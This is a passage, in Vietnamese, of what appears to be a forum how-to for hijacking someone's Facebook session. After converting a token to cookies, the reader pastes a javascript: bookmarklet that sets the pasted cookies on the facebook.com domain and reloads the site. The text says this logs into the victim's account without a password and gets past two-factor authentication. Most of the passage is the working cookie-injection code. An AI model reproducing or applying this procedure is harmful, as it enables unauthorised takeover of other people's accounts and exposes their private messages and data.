Bước 2: Chuyển đổi token -> cookie nhé ( cái này tự tìm hiểu )
Bước 3: Lên trình duyệt có hỗ trợ javascript nhập đường link: http://m.facebook.com Bước 4: nhập mã code ở vị trí : (http://m.facebook.com)= mã code
Mã code: javascript:void(function(){ function setCookie(t) { var list = t.split("; "); console.log(list); for (var i = list.length - 1; i >= 0; i--) { var cname = list[i].split("=")[0]; var cvalue = list[i].split("=")[1]; var d = new Date(); d.setTime(d.getTime() + (7*24*60*60*1000)); var expires = ";domain=.facebook.com;expires="+ d.toUTCString(); document.cookie = cname + "=" + cvalue + "; " + expires; } } function hex2a(hex) { var str = ''; for (var i = 0; i < hex.length; i += 2) { var v = parseInt(hex.substr(i, 2), 16); if (v) str += String.fromCharCode(v); } return str; } var cookie = prompt("Nhập cookie vào bên dưới để đăng nhập", ""); setCookie(cookie); location.href = 'https://facebook.com'; })();
Bước 5: Nó sẽ hiện ra 1 khung thì hãy nhập cookie vào và đăng nhập vào fb của victim
Lưu ý : cách này gọi là xâm nhập tài khoản fb không cầ mật khẩu và tài khoản và vượt xác thực 2 yếu tố
